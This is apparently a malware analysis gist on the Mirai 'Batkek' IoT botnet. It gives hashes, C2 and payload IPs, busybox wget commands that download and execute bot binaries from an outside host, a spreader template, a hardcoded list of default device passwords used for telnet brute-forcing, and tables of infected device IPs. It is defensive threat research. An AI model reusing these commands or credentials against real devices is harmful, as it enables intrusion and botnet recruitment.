unixfreaxjp/Mirai-Batkek.md Secret

## Mirai-Batkek.md

      
    Raw
  

              Mirai-Batkek.md
            
          
    Mirai "Batkek"

Threat definition:


Category
Name
Variant
Type
Target


Linux malware
Mirai
"Batkek"
DDos botnet
Weak auth or vulnerable IoT devices


Samples/PoC:


No
hash
file type


1
5866781e2239cb53d2f6051f123bd44a batkek_arm
ELF 32-bit Packed LSB executable, ARM, version 1, statically linked, stripped


2
e1c628d1f1db493db78bf08d59120725 batkek_mips
ELF 32-bit Packed MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped


3
4c354570729f96ce9a42a12235902f0d loader-mips
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped


Detect period:


from
until


July 1st 2020
(now/on-going)


Infrastructure:


Function
IP
ASN
Prefix
ISP
Country


PayloadIP1
37.49.224.231
AS199264
37.49.224.0/24
XEMU
NL


PayloadIP2
45.88.148.250
AS35913
45.88.148.0/22
DEDIPATH-LLC
US


C2 (Mirai)
45.88.148.250:5683
AS35913
45.88.148.0/22
DEDIPATH-LLC
US


C2 (Infra)
37.49.230.240
AS208666
37.49.230.0/24
ESTROWEB
NL


Binary namaes:


No
Name


1
arm


2
arm7


3
mips


4
mipsel


5
powerpc


6
sh4


7
m68k


8
sparc


Botnet infection rank and heatmap:


Rank
Country
Bots


1
China
45


2
Brazil
31


3
Thailand
16


4
Russia
7


5
USA
6


6
Taiwan
5


(Infection heapmap)

Infection pattern:

enable
system
shell
sh
/bin/busybox DMSNA
/bin/busybox mkdir /tmp/; >/tmp/.file && cd /tmp/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /var/; >/var/.file && cd /var/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /dev/; >/dev/.file && cd /dev/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /mnt/; >/mnt/.file && cd /mnt/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /var/run/; >/var/run/.file && cd /var/run/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /var/tmp/; >/var/tmp/.file && cd /var/tmp/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /; >/.file && cd /
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /dev/netslink/; >/dev/netslink/.file && cd /dev/netslink/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /dev/shm/; >/dev/shm/.file && cd /dev/shm/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /bin/; >/bin/.file && cd /bin/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /etc/; >/etc/.file && cd /etc/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /boot/; >/boot/.file && cd /boot/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /usr/; >/usr/.file && cd /usr/
/bin/busybox rm -rf .file .z .x
/bin/busybox mkdir /sys/; >/sys/.file && cd /sys/
/bin/busybox rm -rf .file .z .x
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HGYQA
/bin/busybox cp /bin/busybox .z; >.z; /bin/busybox chmod 777 .z
/bin/busybox wget hxxp://{PAYLOAD_IP}:80/batkek/arm -O -> .z; /bin/busybox chmod 777 .z; ./.z telnet.arm.wget; >.z

Spreaders:

(wget)
(template) 
/bin/busybox wget http://%d.%d.%d.%d:%d/%s -O -> %s; /bin/busybox chmod 777 %s; ./%s telnet.%s.wget; >%s\r\n
  ↓↓
(execution)
/bin/busybox wget hxxp://37.49.224.231:80/batkek/{arm|arm7|mips|mipsel|powerpc|sh4|m68k|sparc} -O -> .z; \
    /bin/busybox chmod 777 .z; ./.z telnet.{arm|arm7|mips|mipsel|powerpc|sh4|m68k|sparc}.wget; >.z


(hexstring loader)
:> ! file ./batkek-loader-mips
./batkek-loader-mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
:> !rahash2 -a md5 ./batkek-loader-mips
./batkek-loader-mips: 0x00000000-0x000006ef 
md5: 4c354570729f96ce9a42a12235902f0d
:> ie
[Entrypoints]
vaddr=0x004001e8 paddr=0x000001e8 haddr=0x00000018 hvaddr=0x00400018 type=program
:> !seekc2.pl
1
    0x0040024c    |    uStack116 = 2;
    0x00400254    |    uStack114 = 0x50;
    0x00400264    |    uStack112 = 0x2d5894fa;
2
    0x400520 5 4 mips
    0x40052c 23 22 GET /mips HTTP/1.0\r\n\r\n
3
? 0x2d 0x58 0x94 0xfa~uint
uint32  45
uint32  88
uint32  148
uint32  250
4
GET hxxp://45.88.148.250/arm hxxp/1.0\r\n\r\n       
GET hxxp://45.88.148.250/arm7 hxxp/1.0\r\n\r\n  
GET hxxp://45.88.148.250/mips hxxp/1.0\r\n\r\n  
GET hxxp://45.88.148.250/mipsel hxxp/1.0\r\n\r\n
GET hxxp://45.88.148.250/powerpc hxxp/1.0\r\n\r\n     
GET hxxp://45.88.148.250/sh4 hxxp/1.0\r\n\r\n   
GET hxxp://45.88.148.250/m68k hxxp/1.0\r\n\r\n  
GET hxxp://45.88.148.250/sparc hxxp/1.0\r\n\r\n 
:>

Hidden config data (scanner & intrusion related)

ogin...sername...vrdvs...ccount...enter...ulti-call...help...$...#...>...~...
nvalid...ailed...ncorrect...enied...rror...oodbye...bad...solokey...colorkey...
tsgoingon......taZz@23495859......aquario...xc3511...20080826...ahetzip8...changeme...
antslq...hunt5759...alpine...1001chin...samsung...5up...ipcam_rt5350...fidel123...default...
swsbzkgn...sipwise...sixaola...stxadmin...hslwificam...zksoft3...123123...1234qwer...adm...
oelinux123...oelinux1234...ivdev...ttnet...hikvision...icatch99...fxjvt1805...zte...glasshou...
QwestM0dem...gpon...12341234...ho4uku6at...system...linga...adfexc...installer...362729...
nE7jA%5m...telecomadmin...t0talc0ntr0l4!...GM8182...zyad1234...1234567890...1988...linuxshell...
tini...calvin...blender...hipc3518...2011vsta...timeserver...TrippLite...zhongxing...cat1029...
daemon...huigu309...leostream...letacla...zyad5001...annie2012...GEPON...vhd1206...059AnkJ...
e10adc39...merlin...mg3500...qazxsw...grouter...vertex25ektks123...zsun1188...12345...123456...
xmhdipc...h3c...ipc71a...IPCam@sw...cms500...CenturyL1nk...isp...3333333...bin...ispadmin...
CTLsupport12...v2mprt...vsONU101...bananapi...nokia...54321...888888888...localhost...vortex25...
y1n2inc.com0755...nexxadmin...telnetadmin...dnsekakf219651...CUAdmin...zte9x15...juantech...davox...
hacktheworld1337...teladmin...hg2x0...hichiphx...apix...smcadmin...klv123...klv1234...Zte521...
hi3518...jvbzd...anko...zlxx....ceadmin...Cisco...iDirect...hdipc%No...founder88...7ujMko0vizxv...
7ujMko0admin...!root...ikwb...dreambox...realtek...111111111...e8ehome1...e8telnet...localadmin...
99999...7777777...password...6666666...555555555...2222...pass...00000000...user...3ep5w2u...Mau'dib...
wyse...warmWLspot...admin1234...admin1...administrator...support...LSiuY7pOmZG2s...linux...ROOT500...
rootroot...guest...ubnt...service...444444444

Botnet; Size (Sun Aug 23 21:37:10) = 138 (infected devices), w/ IP details:


Bot IP
FQDN
ASN
Network prefix
ASN-ID
Country
ISP Name


1.0.248.39
node-nqf.pool-1-0.dynamic.totinternet.net.
23969
1.0.248.0/21
TOT-NET
TH
TOT Public Company Limited


1.0.251.7
node-oav.pool-1-0.dynamic.totinternet.net.
23969
1.0.248.0/21
TOT-NET
TH
TOT Public Company Limited


1.1.205.195
node-fcz.pool-1-1.dynamic.totinternet.net.
23969
1.1.200.0/21
TOT-NET
TH
TOT Public Company Limited


1.1.234.94
node-l0e.pool-1-1.dynamic.totinternet.net.
23969
1.1.232.0/21
TOT-NET
TH
TOT Public Company Limited


1.2.144.54
node-37a.pool-1-2.dynamic.totinternet.net.
23969
1.2.144.0/20
TOT-NET
TH
TOT Public Company Limited


1.20.187.69

23969
1.20.186.0/23
TOT-NET
TH
TOT Public Company Limited


1.231.7.124

9318
1.224.0.0/13
SKB-AS
KR
SK Broadband Co Ltd


1.4.235.126
node-l8e.pool-1-4.dynamic.totinternet.net.
23969
1.4.224.0/20
TOT-NET
TH
TOT Public Company Limited


1.79.107.147
mo1-79-107-147.air.mopera.net.
9605
1.79.104.0/21
DOCOMO
JP
NTT DOCOMO, INC.


101.51.214.149
node-16dx.pool-101-51.dynamic.totinternet.net.
23969
101.51.208.0/20
TOT-NET
TH
TOT Public Company Limited


101.51.222.97
node-17xd.pool-101-51.dynamic.totinternet.net.
23969
101.51.208.0/20
TOT-NET
TH
TOT Public Company Limited


101.51.226.127
node-18qn.pool-101-51.dynamic.totinternet.net.
23969
101.51.224.0/20
TOT-NET
TH
TOT Public Company Limited


103.72.109.16
103-72-109-16-bau.edu.bd.
132365
103.72.109.0/24
BANGLADESHAGRICULTUR
BD
Bangladesh Agricultural University (BAU)


106.113.147.185

4134
106.113.0.0/16
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


106.127.185.224

134419
106.127.184.0/21
CHINATELECOM-GUANGXI
CN
Beihai


107.192.44.114
107-192-44-114.lightspeed.gdrpmi.sbcglobal.net.
7018
107.192.0.0/12
ATT-INTERNET4
US
ATT-INTERNET4


110.85.99.127
127.99.85.110.broad.pt.fj.dynamic.163data.com.cn.
4134
110.80.0.0/13
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


111.170.85.7

4134
111.170.0.0/16
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


111.224.130.44

4134
111.224.0.0/14
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


112.103.73.80

4134
112.100.0.0/14
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


112.122.65.114

4837
112.122.0.0/15
CHINA169-BACKBONE
CN
CHINA UNICOM China169 Backbone


112.122.72.236

4837
112.122.0.0/15
CHINA169-BACKBONE
CN
CHINA UNICOM China169 Backbone


113.13.4.127

4134
113.12.0.0/14
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


113.15.205.72

4134
113.12.0.0/14
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


113.53.197.77
node-11p.pool-113-53.dynamic.totinternet.net.
23969
113.53.196.0/22
TOT-NET
TH
TOT Public Company Limited


113.92.156.242

4134
113.64.0.0/11
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


114.35.208.71
114-35-208-71.HINET-IP.hinet.net.
3462
114.35.0.0/16
HINET
TW
Data Communication Business Group


118.69.66.79

18403
118.69.64.0/20
FPT-AS-AP
VN
The Corporation for Financing & Promoting Technology


122.121.30.236
122-121-30-236.dynamic-ip.hinet.net.
3462
122.121.0.0/16
HINET
TW
Data Communication Business Group


123.49.35.178

17494
123.49.0.0/18
BTTB-AS-AP
BD
Telecom Operator & Internet Service Provider as well


124.78.198.103
103.198.78.124.broad.xw.sh.dynamic.163data.com.cn.
4812
124.78.0.0/15
CHINANET-SH-AP
CN
China Telecom (Group)


125.24.164.244
node-wl0.pool-125-24.dynamic.totinternet.net.
23969
125.24.160.0/20
TOT-NET
TH
TOT Public Company Limited


125.27.254.104
node-1e94.pool-125-27.dynamic.totinternet.net.
23969
125.27.224.0/19
TOT-NET
TH
TOT Public Company Limited


137.59.44.90

131429
137.59.44.0/24
MOBIFONE-AS-VN
VN
MOBIFONE Corporation


170.231.196.176
176.196.231.170.qualitynet.net.br.
262530
170.231.196.0/23

BR
Quality Net


170.231.197.14
14.197.231.170.qualitynet.net.br.
262530
170.231.196.0/23

BR
Quality Net


170.231.198.237
237.198.231.170.qualitynet.net.br.
262530
170.231.198.0/23

BR
Quality Net


170.231.198.66
66.198.231.170.qualitynet.net.br.
262530
170.231.198.0/23

BR
Quality Net


170.84.197.141
170-84-197-141.lsnet.com.br.
265018
170.84.196.0/23
JS
BR
SERVICOS E TELECOMUNICACOES LTDA ME


171.38.217.49

4837
171.36.0.0/14
CHINA169-BACKBONE
CN
CHINA UNICOM China169 Backbone


171.38.221.229

4837
171.36.0.0/14
CHINA169-BACKBONE
CN
CHINA UNICOM China169 Backbone


175.8.113.238

4134
175.0.0.0/12
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


177.126.128.57
57.128.126.177.customer.netaki.com.br.
262343
177.126.128.0/20

BR
Net Aki Internet Ltda


177.126.140.140
140.140.126.177.customer.netaki.com.br.
262343
177.126.128.0/20

BR
Net Aki Internet Ltda


177.126.140.180
180.140.126.177.customer.netaki.com.br.
262343
177.126.128.0/20

BR
Net Aki Internet Ltda


177.38.181.229
177-38-181-229.micks.com.br.
52971
177.38.181.0/24
MICKS
BR
TELECOM EIRELI


177.52.253.185
253-185.netwtelecom.com.br.
262286
177.52.252.0/23

BR
Netw Telecom


177.67.73.205
205.73.67.177.qualitynet.net.br.
262530
177.67.72.0/23

BR
Quality Net


177.67.77.28
28.77.67.177.qualitynet.net.br.
262530
177.67.76.0/23

BR
Quality Net


177.73.116.206

262569
177.73.116.0/23
MGNET
BR
INFORMATICA E SERVICOS LTDA


177.73.118.120

262569
177.73.118.0/23
MGNET
BR
INFORMATICA E SERVICOS LTDA


177.91.87.54

263433
177.91.84.0/22

BR
Click Telecomunicacoes e Informatica LTDA


177.92.146.168
177-92-146-168.dynamic.starnetcomunicacao.com.br.
263120
177.92.146.0/23
STARNET
BR
COMUNICACAO MULTIMIDIA LTDA ME


177.92.149.209
177-92-149-209.dynamic.starnetcomunicacao.com.br.
263120
177.92.148.0/22
STARNET
BR
COMUNICACAO MULTIMIDIA LTDA ME


177.92.150.53
177-92-150-53.dynamic.starnetcomunicacao.com.br.
263120
177.92.150.0/23
STARNET
BR
COMUNICACAO MULTIMIDIA LTDA ME


179.127.53.184
179-127-53-184.dynamic.ultrawave.com.br.
262659
179.127.48.0/21
ULTRAWAVE
BR
TELECOM


179.127.54.118
179-127-54-118.dynamic.ultrawave.com.br.
262659
179.127.48.0/21
ULTRAWAVE
BR
TELECOM


180.117.130.158

4134
180.96.0.0/11
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


180.137.148.6

4134
180.136.0.0/13
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


180.36.124.239
p2701239-ipngn200905osakachuo.osaka.ocn.ne.jp.
4713
180.0.0.0/10
OCN
JP
NTT Communications Corporation


181.113.26.2

28006
181.113.24.0/21
CORPORACION
EC
NACIONAL DE TELECOMUNICACIONES - CNT EP


182.126.217.115
hn.kd.ny.adsl.
4837
182.112.0.0/12
CHINA169-BACKBONE
CN
CHINA UNICOM China169 Backbone


182.52.145.27
node-snv.pool-182-52.dynamic.totinternet.net.
23969
182.52.144.0/22
TOT-NET
TH
TOT Public Company Limited


183.15.88.213

4134
183.0.0.0/10
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


183.15.88.41

4134
183.0.0.0/10
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


186.193.194.200
186-193-194-200.byteweb.com.br.
262730
186.193.192.0/20

BR
Byteweb Comunicacao Multimidia Ltda.


186.3.240.99
host-186-3-240-99.netlife.ec.
27947
186.3.224.0/19

EC
Telconet S.A


186.47.225.218

28006
186.47.224.0/22
CORPORACION
EC
NACIONAL DE TELECOMUNICACIONES - CNT EP


187.95.230.23
187-95-230-23.user.voax.com.br.
53093
187.95.224.0/19
VOAX
BR
TELECOM SERVICOS LTDA


187.95.245.56
187-95-245-56.user.voax.com.br.
53093
187.95.224.0/19
VOAX
BR
TELECOM SERVICOS LTDA


188.16.144.147

12389
188.16.144.0/20
ROSTELECOM-AS
RU
ROSTELECOM-AS


188.16.146.193

12389
188.16.144.0/20
ROSTELECOM-AS
RU
ROSTELECOM-AS


188.243.37.3
188.243.37.3.pool.sknt.ru.
35807
188.242.0.0/15
SKYNET-SPB-AS
RU
SKYNET-SPB-AS


188.68.12.74

50596
188.68.8.0/21
ITNET33
RU
ITNET33


190.94.192.8
190-94-192-8.ifxnw.com.ve.
8053
190.94.192.0/19
IFX
VE
Networks Venezuela C.A.


191.242.132.3
191-242-132-3.byteweb.com.br.
262730
191.242.128.0/20

BR
Byteweb Comunicacao Multimidia Ltda.


200.52.25.201
200-52-25-201.dynamic.ultrawave.com.br.
262659
200.52.24.0/21
ULTRAWAVE
BR
TELECOM


201.148.162.206
201-148-162-206.dynamic.netvisiondns.com.br.
61864
201.148.160.0/22
NETVISION
BR
TELECOM LTDA - ME


201.150.108.253
201-150-108-253.ivatel.com.br.
52544
201.150.108.0/23

BR
Ivatel Redes e Internet LTDA


202.88.216.242

17488
202.88.216.0/24
HATHWAY-NET-AP
IN
Hathway IP Over Cable Internet


203.151.80.210
210.80.151.203.sta.inet.co.th.
4618
203.151.64.0/19
INET-TH-AS
TH
Internet Thailand Company Limited


203.69.191.102
203-69-191-102.HINET-IP.hinet.net.
3462
203.69.0.0/16
HINET
TW
Data Communication Business Group


212.113.226.119

31499
212.113.224.0/19
YCC-AS
RU
-- iHome --


218.88.85.13
13.85.88.218.broad.cd.sc.dynamic.163data.com.cn.
4134
218.88.0.0/16
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


219.140.52.124

4134
219.140.0.0/16
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


219.140.52.60

4134
219.140.0.0/16
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


220.173.39.87

4134
220.173.0.0/16
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


221.141.94.214

9318
221.140.0.0/14
SKB-AS
KR
SK Broadband Co Ltd


221.203.126.51

4837
221.200.0.0/14
CHINA169-BACKBONE
CN
CHINA UNICOM China169 Backbone


221.227.37.219

4134
221.224.0.0/13
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


222.218.213.149

4134
222.218.0.0/16
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


222.236.156.147

9318
222.232.0.0/13
SKB-AS
KR
SK Broadband Co Ltd


222.236.156.157

9318
222.232.0.0/13
SKB-AS
KR
SK Broadband Co Ltd


223.10.246.81

4134
223.8.0.0/13
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


27.115.2.118

17621
27.115.0.0/18
CNCGROUP-SH
CN
China Unicom Shanghai network


27.21.170.241

4134
27.16.0.0/12
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


27.24.137.140

4134
27.16.0.0/12
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


36.112.59.206

4847
36.112.0.0/16
CNIX-AP
CN
China Networks Inter-Exchange


36.34.160.59

4837
36.32.0.0/14
CHINA169-BACKBONE
CN
CHINA UNICOM China169 Backbone


36.34.162.103

4837
36.32.0.0/14
CHINA169-BACKBONE
CN
CHINA UNICOM China169 Backbone


36.34.78.19

4837
36.32.0.0/14
CHINA169-BACKBONE
CN
CHINA UNICOM China169 Backbone


36.34.79.249

4837
36.32.0.0/14
CHINA169-BACKBONE
CN
CHINA UNICOM China169 Backbone


37.202.120.239

8376
37.202.120.0/22

JO
Jordan Data Communications


45.169.46.100

268097
45.169.46.0/23

BR
i10 Telecom ISP


45.186.89.185
45-186-89-185.pontocom.net.br.
269417
45.186.88.0/23
PONTOCOM
BR
SOLUCOES EM TECNOLOGIA LTDA


45.228.215.236
45-228-215-236.dynamic.mdnetfibra.com.
266112
45.228.214.0/23

BR
J. MATER PROVEDORES E SERVICOS DE TELECOM LTDA


45.65.222.136
45-65-222-136.linqtelecom.com.br.
266539
45.65.222.0/24
LINQ
BR
TELECOMUNICACOES LTDA ME


49.130.18.199

17924
49.130.0.0/17
SMARTONE-MB-AS-AP
HK
SmarTone Mobile Communications Ltd


49.71.130.7

4134
49.64.0.0/11
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


5.165.206.130
5x165x206x130.dynamic.saratov.ertelecom.ru.
50543
5.165.204.0/22
SARATOV-AS
RU
SARATOV-AS


5.79.198.112
pool-5-79-198-112.is74.ru.
8369
5.79.128.0/17
INTERSVYAZ-AS
RU
38-B, Komsomolsky prospekt


51.81.28.122
ip122.ip-51-81-28.us.
16276
51.81.0.0/17
OVH
FR
OVH


58.209.70.66

4134
58.208.0.0/12
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


58.243.134.54

4837
58.242.0.0/15
CHINA169-BACKBONE
CN
CHINA UNICOM China169 Backbone


58.48.153.37

4134
58.48.0.0/13
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


59.115.190.232
59-115-190-232.dynamic-ip.hinet.net.
3462
59.115.0.0/16
HINET
TW
Data Communication Business Group


59.175.85.147

4134
59.172.0.0/14
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


59.60.85.123
123.85.60.59.broad.nd.fj.dynamic.163data.com.cn.
4134
59.60.0.0/15
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


59.60.85.144
144.85.60.59.broad.nd.fj.dynamic.163data.com.cn.
4134
59.60.0.0/15
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


60.176.243.74
74.243.176.60.broad.hz.zj.dynamic.163data.com.cn.
4134
60.176.0.0/12
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


60.250.194.43
60-250-194-43.HINET-IP.hinet.net.
3462
60.250.0.0/16
HINET
TW
Data Communication Business Group


61.190.124.202

4134
61.190.0.0/15
CHINANET-BACKBONE
CN
No.31,Jin-rong Street


67.206.219.142
142-219-206-67-static.centennialpr.net.
11992
67.206.192.0/18
CENTENNIAL-
PR
CENTENNIAL-


68.232.61.143
68.232.61.143-st-tel.net.
30027
68.232.48.0/20
STINET-1
US
STINET-1


68.96.25.174
mail.titanmed.com. OR wsip-68-96-25-174.om.om.cox.net.
22773
68.96.16.0/20
ASN-CXA-ALL-CCI-2277
US
ASN-CXA-ALL-CCI-2277


72.4.34.117
ubnt.customer.eplus.net.
53435
72.4.32.0/20
JACKSONENERGY-EPL
US
JACKSONENERGY-EPL


73.135.166.26
c-73-135-166-26.hsd1.md.comcast.net.
7922
73.0.0.0/8
COMCAST-7922
US
COMCAST-7922


78.66.209.175
78-66-209-175-no2202.tbcn.telia.com.
3301
78.64.0.0/12
TELIANET-SWEDEN
SE
Telia Company


78.84.117.149

12578
78.84.0.0/16
APOLLO-AS
LV
Latvia


78.84.98.26

12578
78.84.0.0/16
APOLLO-AS
LV
Latvia


79.113.190.226
79-113-190-226.rdsnet.ro.
8708
79.112.0.0/13
RCS-RDS
RO
73-75 Dr. Staicovici


84.237.166.85

12578
84.237.128.0/17
APOLLO-AS
LV
Latvia


89.39.28.72

34977
89.39.24.0/21
PROCONO-AS
ES
PROCONO-AS


92.253.19.163

8376
92.253.16.0/22

JO
Jordan Data Communications


94.249.0.32
94.249.x.32.go.com.jo.
8376
94.249.0.0/21

JO
Jordan Data Communications


95.15.118.7
95.15.118.7.dynamic.ttnet.com.tr.
9121
95.15.0.0/17
TTNET
TR
TTNET


96.9.79.23
23.79.9.96.sinet.com.kh.
131207
96.9.79.0/24
SINET-KH
KH
SINET, Cambodia's specialist Internet and Telecom Service Provider.


98.14.156.2
cpe-98-14-156-2.nyc.res.rr.com.
12271
98.14.0.0/16
TWC-12271-NYC
US
TWC-12271-NYC


Sun Aug 23 21:37:10 JST 2020
@unixfreaxjp / malwaremustdie.org
No	hash	file type
1	5866781e2239cb53d2f6051f123bd44a batkek_arm	ELF 32-bit Packed LSB executable, ARM, version 1, statically linked, stripped
2	e1c628d1f1db493db78bf08d59120725 batkek_mips	ELF 32-bit Packed MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
3	4c354570729f96ce9a42a12235902f0d loader-mips	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Function	IP	ASN	Prefix	ISP	Country
PayloadIP1	37.49.224.231	AS199264	37.49.224.0/24	XEMU	NL
PayloadIP2	45.88.148.250	AS35913	45.88.148.0/22	DEDIPATH-LLC	US
C2 (Mirai)	45.88.148.250:5683	AS35913	45.88.148.0/22	DEDIPATH-LLC	US
C2 (Infra)	37.49.230.240	AS208666	37.49.230.0/24	ESTROWEB	NL
Bot IP	FQDN	ASN	Network prefix	ASN-ID	Country	ISP Name
1.0.248.39	node-nqf.pool-1-0.dynamic.totinternet.net.	23969	1.0.248.0/21	TOT-NET	TH	TOT Public Company Limited
1.0.251.7	node-oav.pool-1-0.dynamic.totinternet.net.	23969	1.0.248.0/21	TOT-NET	TH	TOT Public Company Limited
1.1.205.195	node-fcz.pool-1-1.dynamic.totinternet.net.	23969	1.1.200.0/21	TOT-NET	TH	TOT Public Company Limited
1.1.234.94	node-l0e.pool-1-1.dynamic.totinternet.net.	23969	1.1.232.0/21	TOT-NET	TH	TOT Public Company Limited
1.2.144.54	node-37a.pool-1-2.dynamic.totinternet.net.	23969	1.2.144.0/20	TOT-NET	TH	TOT Public Company Limited
1.20.187.69		23969	1.20.186.0/23	TOT-NET	TH	TOT Public Company Limited
1.231.7.124		9318	1.224.0.0/13	SKB-AS	KR	SK Broadband Co Ltd
1.4.235.126	node-l8e.pool-1-4.dynamic.totinternet.net.	23969	1.4.224.0/20	TOT-NET	TH	TOT Public Company Limited
1.79.107.147	mo1-79-107-147.air.mopera.net.	9605	1.79.104.0/21	DOCOMO	JP	NTT DOCOMO, INC.
101.51.214.149	node-16dx.pool-101-51.dynamic.totinternet.net.	23969	101.51.208.0/20	TOT-NET	TH	TOT Public Company Limited
101.51.222.97	node-17xd.pool-101-51.dynamic.totinternet.net.	23969	101.51.208.0/20	TOT-NET	TH	TOT Public Company Limited
101.51.226.127	node-18qn.pool-101-51.dynamic.totinternet.net.	23969	101.51.224.0/20	TOT-NET	TH	TOT Public Company Limited
103.72.109.16	103-72-109-16-bau.edu.bd.	132365	103.72.109.0/24	BANGLADESHAGRICULTUR	BD	Bangladesh Agricultural University (BAU)
106.113.147.185		4134	106.113.0.0/16	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
106.127.185.224		134419	106.127.184.0/21	CHINATELECOM-GUANGXI	CN	Beihai
107.192.44.114	107-192-44-114.lightspeed.gdrpmi.sbcglobal.net.	7018	107.192.0.0/12	ATT-INTERNET4	US	ATT-INTERNET4
110.85.99.127	127.99.85.110.broad.pt.fj.dynamic.163data.com.cn.	4134	110.80.0.0/13	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
111.170.85.7		4134	111.170.0.0/16	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
111.224.130.44		4134	111.224.0.0/14	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
112.103.73.80		4134	112.100.0.0/14	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
112.122.65.114		4837	112.122.0.0/15	CHINA169-BACKBONE	CN	CHINA UNICOM China169 Backbone
112.122.72.236		4837	112.122.0.0/15	CHINA169-BACKBONE	CN	CHINA UNICOM China169 Backbone
113.13.4.127		4134	113.12.0.0/14	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
113.15.205.72		4134	113.12.0.0/14	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
113.53.197.77	node-11p.pool-113-53.dynamic.totinternet.net.	23969	113.53.196.0/22	TOT-NET	TH	TOT Public Company Limited
113.92.156.242		4134	113.64.0.0/11	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
114.35.208.71	114-35-208-71.HINET-IP.hinet.net.	3462	114.35.0.0/16	HINET	TW	Data Communication Business Group
118.69.66.79		18403	118.69.64.0/20	FPT-AS-AP	VN	The Corporation for Financing & Promoting Technology
122.121.30.236	122-121-30-236.dynamic-ip.hinet.net.	3462	122.121.0.0/16	HINET	TW	Data Communication Business Group
123.49.35.178		17494	123.49.0.0/18	BTTB-AS-AP	BD	Telecom Operator & Internet Service Provider as well
124.78.198.103	103.198.78.124.broad.xw.sh.dynamic.163data.com.cn.	4812	124.78.0.0/15	CHINANET-SH-AP	CN	China Telecom (Group)
125.24.164.244	node-wl0.pool-125-24.dynamic.totinternet.net.	23969	125.24.160.0/20	TOT-NET	TH	TOT Public Company Limited
125.27.254.104	node-1e94.pool-125-27.dynamic.totinternet.net.	23969	125.27.224.0/19	TOT-NET	TH	TOT Public Company Limited
137.59.44.90		131429	137.59.44.0/24	MOBIFONE-AS-VN	VN	MOBIFONE Corporation
170.231.196.176	176.196.231.170.qualitynet.net.br.	262530	170.231.196.0/23		BR	Quality Net
170.231.197.14	14.197.231.170.qualitynet.net.br.	262530	170.231.196.0/23		BR	Quality Net
170.231.198.237	237.198.231.170.qualitynet.net.br.	262530	170.231.198.0/23		BR	Quality Net
170.231.198.66	66.198.231.170.qualitynet.net.br.	262530	170.231.198.0/23		BR	Quality Net
170.84.197.141	170-84-197-141.lsnet.com.br.	265018	170.84.196.0/23	JS	BR	SERVICOS E TELECOMUNICACOES LTDA ME
171.38.217.49		4837	171.36.0.0/14	CHINA169-BACKBONE	CN	CHINA UNICOM China169 Backbone
171.38.221.229		4837	171.36.0.0/14	CHINA169-BACKBONE	CN	CHINA UNICOM China169 Backbone
175.8.113.238		4134	175.0.0.0/12	CHINANET-BACKBONE	CN	No.31,Jin-rong Street
177.126.128.57	57.128.126.177.customer.netaki.com.br.	262343	177.126.128.0/20		BR	Net Aki Internet Ltda
177.126.140.140	140.140.126.177.customer.netaki.com.br.	262343	177.126.128.0/20		BR	Net Aki Internet Ltda
177.126.140.180	180.140.126.177.customer.netaki.com.br.	262343	177.126.128.0/20		BR	Net Aki Internet Ltda
177.38.181.229	177-38-181-229.micks.com.br.	52971	177.38.181.0/24	MICKS	BR	TELECOM EIRELI
177.52.253.185	253-185.netwtelecom.com.br.	262286	177.52.252.0/23		BR	Netw Telecom
177.67.73.205	205.73.67.177.qualitynet.net.br.	262530	177.67.72.0/23		BR	Quality Net
177.67.77.28	28.77.67.177.qualitynet.net.br.	262530	177.67.76.0/23		BR	Quality Net
177.73.116.206		262569	177.73.116.0/23	MGNET	BR	INFORMATICA E SERVICOS LTDA
177.73.118.120		262569	177.73.118.0/23	MGNET	BR	INFORMATICA E SERVICOS LTDA
